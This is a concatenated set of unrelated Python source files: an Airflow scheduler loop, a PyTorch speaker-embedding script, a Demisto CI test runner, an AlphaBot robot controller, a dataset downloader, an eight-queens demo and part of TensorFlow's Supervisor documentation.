self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
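# Minimal driver sketch (illustrative; this mirrors how the ``airflow scheduler`` CLI would use
# the class, and the parameter values are assumptions):
#
#     job = SchedulerJob(subdir=settings.DAGS_FOLDER,
#                        num_runs=-1,
#                        processor_poll_interval=1.0)
#     job.run()   # BaseJob.run() handles heartbeats and eventually calls _execute() above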
|
speaker_embed.py
|
import csv
import functools
import multiprocessing
import os
import threading
import numpy as np
import pyworld
import soundfile as sf
import torch
from scipy import stats
class EmbedModel1d(torch.nn.Module):
def __init__(self, n_freq, n_frames):
super(EmbedModel1d, self).__init__()
self.conv1a = torch.nn.Conv1d(n_freq, 512, kernel_size=3, dilation=1, padding='same')
self.conv1b = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.drop1 = torch.nn.Dropout(p=0.2)
self.conv2a = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.conv2b = torch.nn.Conv1d(512, 512, kernel_size=3, dilation=1, padding='same')
self.drop2 = torch.nn.Dropout(p=0.2)
self.conv3 = torch.nn.Conv1d(512, 2048, kernel_size=3, dilation=1, padding='same')
        self.line3 = torch.nn.Linear(2048, 512)  # conv3 outputs 2048 channels after max pooling over time
def _max_pooling(self, x):
return x.max(dim=2)[0]
def forward(self, x):
x = torch.permute(x, dims=[0, 2, 1])
x = torch.nn.functional.relu(self.conv1a(x))
x = torch.nn.functional.relu(self.conv1b(x))
x = self.drop1(x)
x = torch.nn.functional.relu(self.conv2a(x))
x = torch.nn.functional.relu(self.conv2b(x))
x = self.drop2(x)
x = self.conv3(x)
x = self._max_pooling(x)
x = self.line3(x)
return x
class EmbedModel2d(torch.nn.Module):
def __init__(self, n_freq, n_frames):
super(EmbedModel2d, self).__init__()
self.conv1a = torch.nn.Conv2d(1, 64, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv1b = torch.nn.Conv2d(64, 64, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop1 = torch.nn.Dropout2d(p=0.2)
self.pool1 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv2a = torch.nn.Conv2d(64, 128, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv2b = torch.nn.Conv2d(128, 128, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop2 = torch.nn.Dropout2d(p=0.2)
self.pool2 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv3a = torch.nn.Conv2d(128, 256, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.conv3b = torch.nn.Conv2d(256, 256, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.drop3 = torch.nn.Dropout2d(p=0.2)
self.pool3 = torch.nn.MaxPool2d(kernel_size=(1, 4))
self.conv4 = torch.nn.Conv2d(256, 2048, kernel_size=(5, 5), dilation=(1, 1), padding='same')
self.line4 = torch.nn.Linear(2048, 512)
def _max_pooling(self, x):
return x.max(dim=3)[0].max(dim=2)[0]
def forward(self, x):
x = torch.unsqueeze(x, 1)
x = torch.nn.functional.relu(self.conv1a(x))
x = torch.nn.functional.relu(self.conv1b(x))
x = self.drop1(x)
x = self.pool1(x)
x = torch.nn.functional.relu(self.conv2a(x))
x = torch.nn.functional.relu(self.conv2b(x))
x = self.drop2(x)
x = self.pool2(x)
x = torch.nn.functional.relu(self.conv3a(x))
x = torch.nn.functional.relu(self.conv3b(x))
x = self.drop3(x)
x = self.pool3(x)
x = self.conv4(x)
x = self._max_pooling(x)
x = self.line4(x)
return x
class FullModel(torch.nn.Module):
def __init__(self, dim, n_freq=512, n_frames=32, nclasses=16):
super(FullModel, self).__init__()
if dim == 1:
self.embed = EmbedModel1d(n_freq, n_frames)
elif dim == 2:
self.embed = EmbedModel2d(n_freq, n_frames)
else:
            raise ValueError('The "dim" argument must be 1 or 2.')
self.drop1 = torch.nn.Dropout(p=0.2)
self.line2 = torch.nn.Linear(512, 1024)
self.drop2 = torch.nn.Dropout(p=0.2)
self.line3 = torch.nn.Linear(1024, nclasses)
def forward(self, x):
x = torch.nn.functional.relu(self.embed(x))
x = self.drop1(x)
x = torch.nn.functional.relu(self.line2(x))
x = self.drop2(x)
x = torch.nn.functional.log_softmax(self.line3(x), dim=-1)
return x
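# Illustrative shape check (assumed input layout: batch x n_frames x n_freq, matching the
# permute/unsqueeze calls above):
#
#     model = FullModel(dim=2, n_freq=512, n_frames=32, nclasses=16)
#     dummy = torch.randn(4, 32, 512)
#     log_probs = model(dummy)        # -> (4, 16) log-probabilities
#     embedding = model.embed(dummy)  # -> (4, 512) speaker embedding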
def main():
ngpus = 4
lock = threading.Lock()
results = dict()
threads = list()
for thread_id in range(ngpus):
thread = threading.Thread(target=multithread, args=([thread_id, ngpus, lock, results]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
speaker_embed_list = np.vstack([results[i] for i in range(ngpus)])
    np.savez_compressed('resource/speaker-embeds.npz', embed=speaker_embed_list)
def multithread(thread_id, nthread, lock, results):
    pool = multiprocessing.Pool(processes=3)
    speakers = range(thread_id * 100 // nthread, (thread_id + 1) * 100 // nthread)
    speaker_embed_list = np.array(
        pool.map(functools.partial(get_speaker_embed, gpu_id=thread_id), speakers))
    with lock:
        results[thread_id] = speaker_embed_list
def get_speaker_embed(speaker, gpu_id):
    speaker_classifier = FullModel(2).to(f'cuda:{gpu_id}')
    speaker_classifier.load_state_dict(torch.load('resource/speaker-encoder.pth'))
embed_list = list()
for seiren_speaker in [10]:
for speech in range(100):
print(f'Processing: jvs{speaker + 1:03d} - seiren_jvs{seiren_speaker + 1:03d} - VOICEACTRESS100_{speech + 1:03d}\r', end='')
wave, sr = sf.read(f'resource/seiren_jvs{seiren_speaker + 1:03d}/jvs{speaker + 1:03d}/VOICEACTRESS100_{speech + 1:03d}.wav')
f0, sp, ap, t = wave_decompose(wave, sr)
labels = load_csv(f'resource/jvs_ver1_fixed/jvs{seiren_speaker + 1:03d}/VOICEACTRESS100_{speech + 1:03d}.lab', delimiter='\t')
phonemes = extract_phonemes(sp, labels)
phonemes = torch.from_numpy(phonemes[:, :, :512]).float().to(f'cuda:{gpu_id}')
            embed_sub = speaker_classifier.embed(phonemes)
embed_sub = embed_sub.to('cpu').detach().numpy().copy()
embed_list.append(embed_sub)
del phonemes
del embed_sub
    del speaker_classifier
torch.cuda.empty_cache()
embed_list = np.vstack(embed_list)
    # Keep the embedding at the density peak (the KDE mode) as this speaker's
    # representative embedding.
    z = stats.gaussian_kde(embed_list.T)(embed_list.T)
    speaker_embed = embed_list[np.argmax(z)]
return speaker_embed
def wave_decompose(wave, sr):
f0, t = pyworld.harvest(wave, sr)
sp = pyworld.cheaptrick(wave, f0, t, sr)
ap = pyworld.d4c(wave, f0, t, sr)
return f0, sp, ap, t
def load_csv(path, delimiter=','):
with open(path, 'r', newline='', encoding='utf-8') as f:
tsv_reader = csv.reader(f, delimiter=delimiter)
labels = [row for row in tsv_reader]
return labels
def extract_phonemes(sp, labels, target_length=32, min_length=24):
sp_list = list()
for start_sec, end_sec, phoneme in labels:
if phoneme in ['silB', 'silE', 'sp']:
continue
        separation_rate = 200  # frames per second (pyworld's default 5 ms frame period)
start_frame = int(float(start_sec) * separation_rate)
end_frame = int(float(end_sec) * separation_rate)
if start_frame + min_length + 1 >= end_frame:
continue
def padding(x, target_length):
y_pad = target_length - len(x)
return np.pad(x, ((0, y_pad), (0, 0)), mode='constant') if y_pad > 0 else x[:target_length]
sp_list.append(padding(sp[start_frame:end_frame], target_length).astype(np.float32))
return np.array(sp_list)
if __name__ == '__main__':
    main()
|
execute_test_content.py
|
import os
import sys
from threading import Thread
import requests
from demisto_sdk.commands.test_content.ParallelLoggingManager import \
ParallelLoggingManager
from demisto_sdk.commands.test_content.TestContentClasses import (
BuildContext, ServerContext)
SKIPPED_CONTENT_COMMENT = 'The following integrations/tests were collected by the CI build but are currently skipped. ' \
'The collected tests are related to this pull request and might be critical.'
COVERAGE_REPORT_COMMENT = 'Link to the unit tests coverage report'
def _handle_github_response(response, logging_module) -> dict:
res_dict = response.json()
if not response.ok:
logging_module.error(f'Add pull request comment failed: {res_dict.get("message")}', real_time=True)
return res_dict
def _add_pr_comment(comment, logging_module):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CI_COMMIT_BRANCH']
sha1 = os.environ['CI_COMMIT_SHA']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
is_skipped_tests_flow = 'The following integrations/tests were collected' in comment
try:
response = requests.get(url + query, headers=headers, verify=False)
res = _handle_github_response(response, logging_module)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
# Check if a comment about skipped tests already exists. If one exists, delete it first and then
# post a new comment:
response = requests.get(issue_url, headers=headers, verify=False)
issue_comments = _handle_github_response(response, logging_module)
for existing_comment in issue_comments:
if (is_skipped_tests_flow and SKIPPED_CONTENT_COMMENT in existing_comment.get('body', '')) or \
(not is_skipped_tests_flow and COVERAGE_REPORT_COMMENT in existing_comment.get('body', '')):
comment_url = existing_comment.get('url')
requests.delete(comment_url, headers=headers, verify=False)
response = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
_handle_github_response(response, logging_module)
else:
logging_module.warning('Add pull request comment failed: There is more than one open pull '
f'request for branch {branch_name}.', real_time=True)
except Exception:
logging_module.exception('Add pull request comment failed')
def execute_test_content(**kwargs):
logging_manager = ParallelLoggingManager('Run_Tests.log', real_time_logs_only=not kwargs['nightly'])
build_context = BuildContext(kwargs, logging_manager)
use_retries_mechanism = kwargs.get('use_retries', False)
threads_list = []
for server_ip, port in build_context.instances_ips.items():
tests_execution_instance = ServerContext(build_context, server_private_ip=server_ip, tunnel_port=port,
use_retries_mechanism=use_retries_mechanism)
threads_list.append(Thread(target=tests_execution_instance.execute_tests))
for thread in threads_list:
thread.start()
for t in threads_list:
t.join()
if not build_context.unmockable_tests_to_run.empty() or not build_context.mockable_tests_to_run.empty():
raise Exception('Not all tests have been executed')
if build_context.tests_data_keeper.playbook_skipped_integration \
and build_context.build_name != 'master' \
and not build_context.is_nightly:
skipped_integrations = '\n- '.join(build_context.tests_data_keeper.playbook_skipped_integration)
comment = f'{SKIPPED_CONTENT_COMMENT}:\n- {skipped_integrations}'
_add_pr_comment(comment, logging_manager)
build_context.tests_data_keeper.print_test_summary(build_context.isAMI, logging_manager)
build_context.tests_data_keeper.create_result_files()
if build_context.tests_data_keeper.failed_playbooks:
logging_manager.critical("Some tests have failed. Not destroying instances.", real_time=True)
sys.exit(1)
|
micro_controller.py
|
import RPi.GPIO as GPIO
import time
import random
import sys
import signal
import csv
from math import pi, fabs, cos, sin
from alphabot import AlphaBot
import multiprocessing
R = 0.034  # drive wheel radius in m (~6.8 cm diameter)
r = 0.0165  # wooden wheel radius (m)
L = 0.132  # distance between the wheels (m)
Ab = AlphaBot()
Ab.stop()
vmax = 100
vmin= 30
#for wr the equation for voltage is v = (wr - B)/ A
A = 0.154085#0.16136027
B = 6.8064#-1.2869597
#for wl the equation for voltage is v = (wl - D)/ C
C = 0.166486#0.16225248
D = 5.55511#-0.3943191
F = 2.061# 7.092
G = 308.1 #318.5
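# Editor's sketch (hypothetical helper, not used by the class below): the calibration
# comments above model each wheel as w = gain * voltage + offset, so the motor voltage
# needed for a target wheel speed w (rad/s) is just the inverse of that line.
def _voltage_for_speed(w, gain, offset):
    return (w - offset) / gain
# e.g. right wheel: _voltage_for_speed(12.0, A, B); left wheel: _voltage_for_speed(12.0, C, D)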
class MicroControler(object):
def move_and_control(self, a):
start_time = time.time()
T = 0.3
reference_position = a
xo = a[0]
yo = a[1]
fo = a[2]
xref = a[3]
yref = a[4]
fref = int(a[5])
orientation = 0
rotational = 0
e = 0.4
vmax = 100
vmin= 20
wrlist, wllist , ur, ul, x1, x2, x3, duration, timestamp = ([] for i in range(9))
if fref!=fo:
rotational = 1
#TODO uncomment
#T = ((fabs(fref)+6.2687)/134.7328)
e = 0.2
T = ((fabs(fref)+F)/G)
fref = fref*pi / 180
counter = 2
moves = 0
dt = T
while moves<4:
moves += 1
# set velocities to reach xref, yref, fref
# rotational motion first, then translational
if fabs(fabs(fref)-fabs(fo))>= e :
if rotational == 1 and moves > 1:
dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+F)/G)
elif rotational ==0:
dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+F)/G)
# dt = ((fabs(fabs(fref*180/pi)-fabs(fo*180/pi))+6.2687)/134.7328)
w = L*(fref-fo)/(dt*2*R) # half the time, double the angular velocity
a = fabs(w) / w
w = 12
right_voltage = (w - B)/A
left_voltage = (w - D)/C
w = w* a
df = fref
#print ("right_voltage: "+str(right_voltage)+ " left_voltage: "+str(left_voltage))
if w < 0: # need to turn right ( + , + )
orientation = 2
right_voltage= right_voltage
left_voltage= left_voltage
else: # need to turn left ( - , - )
orientation = 3
right_voltage= -right_voltage
left_voltage= -left_voltage
#print ("right_voltage: "+str(right_voltage)+ " left_voltage: "+str(left_voltage))
elif (fabs(fabs(xref)-fabs(xo))>= 0.05 and (rotational!= 1)):
#print ("metaforiki kinhsh")
w = (xref-xo)/(R*dt)
while True:
if 0 <=w< 12 :
#dt = float(dt)/float(1.01)
w = 12 # (xref-xo)/(R*dt)
elif w >14: #21.5 :
#dt = dt * 1.01
w = 14 #21.5 # (xref-xo)/(R*dt)
elif 0>w>-12 :
#dt = dt / float(1.01)
w = -12 #(xref-xo)/(R*dt)
elif w < - 14 :
#dt = dt * 1.01
w = -14 #(xref-xo)/(R*dt)
else: break
right_voltage = (abs(w) - B)/A
left_voltage = (abs(w) - D)/C
if w >= 0:
orientation = 0
right_voltage = -right_voltage # if w > 0 go straight ahead, so ( - , + )
left_voltage = +left_voltage
if w < 0: # if w < 0 go in reverse, so ( + , - )
right_voltage = right_voltage
left_voltage = -left_voltage
orientation = 1
else :
Ab.stop()
#print ("STOPPPPPPPPPPPPPPPPPPPP")
break
print ("To dt einai auth th fora : ")+str(dt)
#print ("To w einai : ")+str(w)
#print ("right voltage :" + str(right_voltage) , "left_voltage "+ str(left_voltage))
#print ("apostasi apo stoxo se cm: "+str(fabs(xref-xo)) )
Ab.setMotor(right_voltage, left_voltage) # RIGHT FIRST, THEN LEFT !!! THE ARGUMENTS ARE REVERSED IN SETMOTOR
#fork processes and grab results after dt
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
p = multiprocessing.Process(target=self.right_velocity,args=(0, return_dict))
jobs.append(p)
p.daemon=True
p.start()
k = multiprocessing.Process(target=self.left_velocity,args = ( 1 , return_dict))
jobs.append(k)
k.daemon=True
k.start()
time.sleep(dt)
p.terminate()
k.terminate()
p.join(T)
k.join(T)
# try to grab measurements
counter = 2
try:
wr = return_dict[0]
dtr = return_dict[2]
#TODO
if wr > A*vmax+B :
#print "measured maximum wr "
wr = A * vmax +B
except:
#print ("error1")
wr = pi /(10 * T)
#wr = 0
#dtr = dt
counter = counter -1
try:
wl = return_dict[1]
dtl = return_dict[3]
#TODO
if wl > C*vmax+D :
#print "measured maximum wl "
wl = C * vmax +D
except:
#print ("error2")
wl = pi / (10 * T)
#wl = 0
counter = counter -1
dtl = dt
#if counter == 2 :
#dt = (dtl+dtr)/counter
#print "ok"
#elif counter==0 and rotational==1:
#print ("two errors when reading from light sensors")
#calculate new xo,yo,fo
if orientation == 3: # I told it to turn left in place
wr = wr # before it went right with a negative sign, now I want to go left with a positive one
wl = -wl # so wr - wl must be positive
if orientation == 2: # I told it to turn right in place
wr = -wr # before it went left with a positive sign, now I want to go right with a negative one
wl = wl # so wr - wl must be negative
if orientation == 1 :
wr= -wr
wl= -wl
if (dt * R*(wr-wl)/L)> 0.7:
c = 1
else:
c = 1
if orientation == 1 or orientation == 0 :
fo = fo + (dt * R*(wr-wl)/L)/c
fo = random.uniform(-3.0,3.0)
fo = fo* pi/180
else :
fo = df
print ("Measured wr: "+str(round(wr,2))+" rad/s" , " wl: "+str(round(wl,2))+" rad/s", " dt of mesaurement: "+ str(round(dt,2)) +" ms", " Angle from initial orientation of this step, f0: "+ str(round((fabs(fref*180/pi)-fabs((fo*180/pi))),2))+" degrees")
if orientation ==0 or orientation==1:
xo = xo + (dt*cos(fo)*R*(wr+wl)/2)/0.7
yo = yo + dt*sin(fo)*R*(wr+wl)/2
print ("Measured values from light sensors: xo: "+str(round(xo*100,2))+" cm", " yo: "+str(round(yo*100,2)) +" cm", " fo: "+str(round((fo*180/pi),2))+" degrees")
Ab.stop()
wrlist.append(wr)
wllist.append(wl)
ur.append(right_voltage)
ul.append(left_voltage)
x1.append(xo)
x2.append(yo)
x3.append(fo)
duration.append(dt)
timestamp.append(time.time())
#TODO this needs a 0.5 s sleep here
time.sleep(1)
Ab.stop()
xo = round(xo*100,2)
yo = round(yo*100,2)
fo = round(fo *180 / pi,2)
return xo,yo,fo,wrlist,wllist,ur,ul,x1,x2,x3,duration,timestamp
def right_velocity(self, procnum, return_dict):
DR = 8
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(DR,GPIO.IN,GPIO.PUD_UP)
prev_status= 0
changes = 0
prev_time = time.time()
while True:
DR_status = GPIO.input(DR)
if(DR_status == 0):
if DR_status != prev_status:
prev_status = 0
changes += 1
now_time = time.time()
dtime= now_time - prev_time
w = (pi*changes)/(10* dtime) # angular velocity in rad/s (each transition corresponds to pi/10 rad)
return_dict[procnum] = w # right wheel angular velocity
return_dict[2] = dtime # measurement window in seconds
elif (DR_status == 1):
if DR_status != prev_status:
prev_status = 1
def left_velocity(self, procnum, return_dict):
DR = 7
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(DR,GPIO.IN,GPIO.PUD_UP)
prev_status= 0
changes = 0
prev_time = time.time()
while True:
DR_status = GPIO.input(DR)
if(DR_status == 0):
if DR_status != prev_status:
prev_status = 0
changes += 1
now_time = time.time()
dtime= now_time - prev_time
w = (pi*changes)/(10* dtime) # angular velocity in rad/s (each transition corresponds to pi/10 rad)
return_dict[procnum] = w # left wheel angular velocity
return_dict[3] = dtime # measurement window in seconds
elif (DR_status == 1):
if DR_status != prev_status:
prev_status = 1
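# Editor's sketch: the pose update inside move_and_control() above is the standard
# differential-drive (unicycle) odometry model. A minimal stand-alone version, without
# the empirical correction factors used above, assuming wheel radius R, wheel base L
# and measured wheel speeds wr, wl in rad/s:
def _odometry_step(xo, yo, fo, wr, wl, dt):
    v = R * (wr + wl) / 2.0   # forward velocity of the robot centre (m/s)
    w = R * (wr - wl) / L     # angular velocity around the centre (rad/s)
    fo = fo + w * dt          # new heading (rad)
    xo = xo + v * cos(fo) * dt
    yo = yo + v * sin(fo) * dt
    return xo, yo, fo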
|
download.py
|
import os
import zipfile
import argparse
import urllib.request as req
import ssl
from threading import Thread
from multiprocessing import SimpleQueue as Queue
def unzip(zip_filepath, dest_dir='./data'):
with zipfile.ZipFile(zip_filepath) as zf:
zf.extractall(dest_dir)
print("Extraction complete!")
def download_vcc2016():
datalink = "https://datashare.is.ed.ac.uk/bitstream/handle/10283/2211/"
data_files = ['vcc2016_training.zip', 'evaluation_all.zip']
if os.path.exists(data_files[0]) or os.path.exists(data_files[1]):
print("File already exists!")
return
trainset = f'{datalink}{data_files[0]}'
evalset = f'{datalink}{data_files[1]}'
print('Start download dataset...')
th = Thread(target=download_file, args=[trainset])
th.start()
download_file(evalset)
th.join()
unzip(data_files[0])
unzip(data_files[1])
print('Finish download dataset...')
def download_file(url: str, out_path: str = None, buffer_size: int = 10*(1024**2)):
data = Queue()
def _download():
b = data.get()
with open(out_path or url.split('/')[-1], 'wb') as o:
while b:
o.write(b)
b = data.get()
s = ssl.SSLContext()
f = req.urlopen(url, context=s)
th = Thread(target=_download)
th.start()
b = f.read(buffer_size)
while b:
data.put(b)
b = f.read(buffer_size)
data.put([])  # falsy sentinel: tells the writer thread to stop
th.join()
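# Editor's note: download_file() above is a small producer/consumer pipeline - the main
# thread reads chunks from the network and queues them while a writer thread drains the
# queue to disk, with an empty (falsy) item as the stop sentinel. A hypothetical direct
# use (the URL here is purely illustrative) would look like:
def _example_download():
    download_file('https://example.com/archive.zip', out_path='./archive.zip',
                  buffer_size=1024 ** 2)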
def create_dirs(trainset: str = './data/fourspeakers', testset: str = './data/fourspeakers_test'):
'''create train test dirs'''
if not os.path.exists(trainset):
print(f'create train set dir {trainset}')
os.makedirs(trainset, exist_ok=True)
if not os.path.exists(testset):
print(f'create test set dir {testset}')
os.makedirs(testset, exist_ok=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Download voice conversion datasets.')
datasets_default = 'vcc2016'
train_dir = './data/fourspeakers'
test_dir = './data/fourspeakers_test'
parser.add_argument('--datasets', type=str, help='Datasets available: vcc2016', default=datasets_default)
parser.add_argument('--train_dir', type=str, help='trainset directory', default=train_dir)
parser.add_argument('--test_dir', type=str, help='testset directory', default=test_dir)
argv = parser.parse_args()
datasets = argv.datasets
create_dirs(train_dir, test_dir)
if datasets == 'vcc2016' or datasets == 'VCC2016':
download_vcc2016()
else:
print('Dataset not available.')
|
demo.py
|
from multiprocessing import Process, Queue
from eightqueens import eightqueens
def eight_queens(n: int, find_all: bool = True, visualize: bool = False):
if visualize:
from gui import gui
q = Queue()
visualization = Process(target=gui.visualize_search, args=(n, q))
visualization.daemon = True
visualization.start()
else:
q = None
res = eightqueens.find_path(n, find_all, events_queue=q)
if visualize:
visualization.join()
return res
if __name__ == '__main__':
eight_queens(8, False, True)
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitializes variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific host, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server`).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess, ))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optional `summary_op` and `saver` passed to the constructor, or
